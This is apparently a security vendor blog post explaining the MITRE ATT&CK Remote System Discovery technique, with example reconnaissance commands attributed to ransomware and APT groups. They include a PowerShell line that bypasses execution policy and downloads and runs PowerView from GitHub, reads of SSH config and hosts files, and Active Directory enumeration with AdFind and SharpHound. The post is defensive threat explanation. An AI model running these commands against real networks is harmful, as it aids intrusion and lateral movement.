T1018 Remote Service Discovery of the MITRE ATT&CK Framework

Huseyin Can YUCEEL  By Huseyin Can YUCEEL  •  May 12, 2023

 

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

Modern enterprise networks are an enormous web of hosts and services spanning multiple locations. To orchestrate sophisticated cyber-attacks, advanced threat actors study these networks carefully and map their victims' environment. Since remote services are a great pivoting point from one network to another, adversaries aim to identify them for lateral movement attacks. In this blog, we explain one of the most prevalent discovery techniques that is often a precursor to lateral movement attacks, T1018 Remote Service Discovery.

red-report-mockup-small  

The Red Report 2023
The 10 Most Prevalent MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD NOW!

MITRE ATT&CK T1018 Remote Service Discovery

Adversaries' objectives almost always require them to compromise more than one host or network since organizations utilize multiple hosts and networks for their operations. Thus, following the initial access, adversaries scan for other hosts and networks they can pivot to from the compromised initial system. Network enumeration for other hosts and services allows adversaries to understand their victim's environment better and plan their next steps to achieve their objectives. The MITRE ATT&CK framework classifies these efforts as T1018 Remote System Discovery, and adversaries use native commands and custom tools to exercise this technique.

OS Commands Used to Discover Remote Systems 

Many operating systems have native commands and tools for networking that allow users to discover other hosts, networks, and services in their environment. Adversaries leverage these built-in utilities to discover remote systems and services. Using built-in utilities also has a low chance of being flagged as malicious operations and allows adversaries to appear legitimate.

Some of the commonly abused native commands are as follows.

net (Windows): net is a command-line tool that manages network settings for Windows operating systems. Using the net command, users can view and manage network shares, print jobs, network users, and many others. Adversaries use this command to enumerate computers and shared resources in a target network. For example, the infamous loader and backdoor malware BazarLoader uses the commands below for remote system discovery [1].

//listing computers in the current domain
net view


//display all the shares
net view /all


//display all the shares in a given domain
net view /all /domain[:/DomainName]

In 2022, ransomware threat actors utilized malware loaders such as QAKBOT and IcedID to gain initial access to their target networks and discover hosts and services in the compromised networks [2], [3]. QAKBOT and IcedID also used the net tool to gather environmental information about the compromised host, network, and domain.

Adversaries also use tools that were meant to be used in penetration tests, such as PowerSploit. Ryuk ransomware operators use the PowerSploit module given below to discover remote systems in a compromised environment [4].

powershell.exe -exec bypass -Command "&{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-NetSubnet; Get-NetComputer}"

arp (Windows, Linux, macOS): ARP (Address Resolution Protocol) is a common communication protocol used for associating MAC addresses (layer 2) to IP addresses (layer 3) and vice versa. Operating systems use arp tables to keep track of MAC-IP address pairs for network operations. The arp command allows users to interact with the ARP cache and enter the ARP table. Adversaries use arp and other native commands to harvest information about other hosts and services in the network [5].

//displaying the ARP table in Windows
arp -a -N <network_interface>

//displaying the ARP table in Linux and macOS
arp -a -i <network_interface>


//displaying ARP table in network device CLI

show arp

show ip arp

/etc/hosts & SSH hosts: Hostnames and IP addresses of other hosts in the network are stored in the "/etc/hosts" file by the operating system. Adversaries access this file to infer the presence of remote systems in the compromised network. 

//reading local hosts file in Windows
type C:\Windows\System32\Drivers\etc\hosts


//reading local hosts file in Linux and macOS
cat /etc/hosts

SSH (Secure Shell) is a commonly used application for remote login and command-line execution. Once a user connects to a remote host, information about the host is saved for convenience, such as the hostname, username, and IP address of the host in the SSH config files. Adversaries check and read this configuration file to gather information about remote hosts.

//reading local hosts file in Linux
cat <home_dir>/.ssh/config

ping (Windows, Linux, macOS): ping allows users to check network connectivity with other computers in the network via ICMP echo request messages. ping can test both the hostname and the IP address of the host. Adversaries use ping to validate that a target system or service can be reached from the compromised system [6].

//sending single ICMP echo request to check connectivity
ping -n 1 <hostname>

//Reverse name resolution via ping

ping -n 1 -a <target_host's_ip>

Since ping uses ICMP, defenders can track/block ICMP traffic to identify/prevent misuse of ping in their network with a small cost on functionality. In March 2022, CISA mentioned that Russian APT actors used ping for network discovery and testing network connectivity to remote hosts [7].

Tools Used to Discover Remote Systems

In addition to native OS commands, adversaries often utilize custom tools to discover remote systems in a compromised network. Some of these tools are not inherently malicious. However, adversaries use them to collect information and enumerate remote systems for their malicious activities.

NBTscan: NBTscan is an open-source tool that scans IP networks for NetBIOS name information. NBTscan sends NETBIOS status queries to the given list of IP addresses and lists received information, including the host's IP address, NETBIOS computer name, logged-in user, and MAC address. Adversaries scan the target network using NBTscan to gather information about other hosts and services in the network [8]. In many supply chain attacks, threat actors use NBTscan, TCPing, FastReverseProxy, and Fscan to discover remote systems [9].

nbtscan <target_ip>/<subnet_mask>


IP address NetBIOS Name Server User MAC address
-------------------------------------------------------------------
192.168.1.2 JohnSmith John 00-a0-c9-12-34-56
192.168.1.5 RuthJones <server>   Ruth 00-a0-c9-78-90-00
192.168.1.123 BobTaylor <server>   Bob 08-00-09-12-34-56

In various attack campaigns against Eastern European and Asian countries, Chinese APT actors use NBTscan to scan infected networks and find remote hosts and services. To avoid detection, attackers delivered NBTscan in an archive file (ace.cab) and unpacked it as ace.exe before using it [10], [11].

AdFind: AdFind is a publicly available command-line Active Directory query tool that features capabilities of ldapsearch, search.vbs, ldp, dsquery and dsget in a single place [12]. Adversaries use AdFind to enumerate Active Directory and extract information about hosts and services. For example, the Bumblebee malware loader uses the following command to list computers in the Active Directory [13].

adfind.exe -f "objectcategory=computer" > ad_computers.txt

Adversaries use AdFind to discover subnets for remote system discovery [14].

adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt

Many ransomware groups such as Quantum, Black Basta, BlackByte, and Play also abuse AdFind to discover and enumerate Active Directory using the same commands [15]–[18].

BloodHound, SharpHound, AzureHound: BloodHound, SharpHound, and AzureHound are publicly available tools that adversaries use to collect information about their target's Active Directory environment. After gaining initial access, threat actors run SharpHound or AzureHound in the compromised host and discover other hosts and assets in the target network or cloud environment, respectively. Then, collected data is visualized by the BloodHound GUI, and BloodHound maps the hosts, services, and other AD objects and their relationships [14].

//collecting information about Active Directory
SharpHound.exe --CollectionMethod All --ZipFileName output.zip

//collecting information about Active Directory via PowerShell
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod all -ZipFileName output.zip


//collecting information about all Azure objects in a tenant
Import-Module .\AzureHound.ps1
Invoke-AzureHound

SoftPerfect Network Scanner: SoftPerfect Network Scanner is a network administration tool for Windows and macOS systems actively used by cyber threat actors. Infamous ransomware group Conti used it in their ransomware operations to scan compromised networks [19]. To appear legitimate, the tool was named netscan64_.exe and netscanold.exe and scanned the network for NetBIOS (port 137), SMB (port 445), RDP (port 3389), and shared locations. 

LadonGo: LadonGo is an open-source penetration scanner framework written in Go that can scan the network for hosts and services [20]. LadonGo also features automated exploitation with limited capability. Adversaries use LadonGo to discover remote systems via port, ICMP, SNMP, and banner scanning. For example, ShadowPad malware developers adopted LadonGo to scan internal networks for hosts with RDP services running [21]. 

References

[1]   C. Nocturnus, "A Bazar of Tricks: Following Team9's Development Cycles." [Online]. Available: https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles. [Accessed: Jan. 09, 2023]

[2]   "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike," Trend Micro, Oct. 12, 2022. [Online]. Available: https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html. [Accessed: Jan. 10, 2023]

[3]   "Quantum Ransomware," The DFIR Report, Apr. 25, 2022. [Online]. Available: https://thedfirreport.com/2022/04/25/quantum-ransomware/. [Accessed: Jan. 10, 2023]

[4]   H. Manocha, "Ryuk Ransomware: History, Timeline, and Adversary Simulation," FourCore. [Online]. Available: https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp. [Accessed: Jan. 10, 2023]

[5]   D. Stepanic, S. Bousseaden, A. Pease, T. DeJesus, and C. François, "Embracing offensive tooling: Building detections against Koadic using EQL," Elastic Blog. [Online]. Available: https://www.elastic.coen-us/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql. [Accessed: Jan. 09, 2023]

[6]   W. Jansen, "Abusing cloud services to fly under the radar," NCC Group Research, Jan. 12, 2021. [Online]. Available: https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/. [Accessed: Jan. 09, 2023]

[7]   "Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and 'PrintNightmare' Vulnerability." [Online]. Available: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a. [Accessed: Jan. 10, 2023]

[8]   "[No title]." [Online]. Available: https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf. [Accessed: Jan. 09, 2023]

[9]   J. Vijayan, "ShadowPad Threat Actors Return With Fresh Government Strikes, Updated Tools," Dark Reading, Sep. 13, 2022. [Online]. Available: https://www.darkreading.com/attacks-breaches/shadowpad-threat-actor-dll-sideloading-espionage. [Accessed: Jan. 10, 2023]

[10]   "Targeted attack on industrial enterprises and public institutions," Kaspersky ICS CERT | Kaspersky Industrial Control Systems Cyber Emergency Response Team, Aug. 08, 2022. [Online]. Available: https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/. [Accessed: Jan. 10, 2023]

[11]   "Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries." [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority. [Accessed: Jan. 10, 2023]

[12]   "AdFind." [Online]. Available: http://www.joeware.net/freetools/tools/adfind/index.htm. [Accessed: Jan. 09, 2023]

[13]   "THREAT ANALYSIS REPORT: Bumblebee Loader – The High Road to Enterprise Domain Control." [Online]. Available: https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control. [Accessed: Jan. 09, 2023]

[14]   B. Donohue, "A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak," Red Canary, Oct. 29, 2020. [Online]. Available: https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/. [Accessed: Jan. 09, 2023]

[15]   "Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa," Trend Micro, Sep. 06, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html. [Accessed: Jan. 10, 2023]

[16]   J. Salazar and J. C. Vázquez, "Microsoft Active Directory as a Prime Target for Ransomware Operators," SentinelOne, Aug. 24, 2022. [Online]. Available: https://www.sentinelone.com/blog/microsoft-active-directory-as-a-prime-target-for-ransomware-operators/. [Accessed: Jan. 10, 2023]

[17]   "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool." [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware. [Accessed: Jan. 10, 2023]

[18]   Northwave, "Black Basta: New face, old tricks - An analysis of their methods and malware," Northwave, Jun. 10, 2022. [Online]. Available: https://northwave-security.com/en/black-basta-blog/. [Accessed: Jan. 10, 2023]

[19]   "[No title]." [Online]. Available: https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf. [Accessed: Jan. 10, 2023]

[20]   "GitHub - k8gege/LadonGo: LadonGO 4.2 Pentest Scanner framework," GitHub. [Online]. Available: https://github.com/k8gege/LadonGo. [Accessed: Jan. 09, 2023]

[21]   "New Wave of Espionage Activity Targets Asian Governments." [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments. [Accessed: Jan. 10, 2023]

 
#MITRE #Article #Blog

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD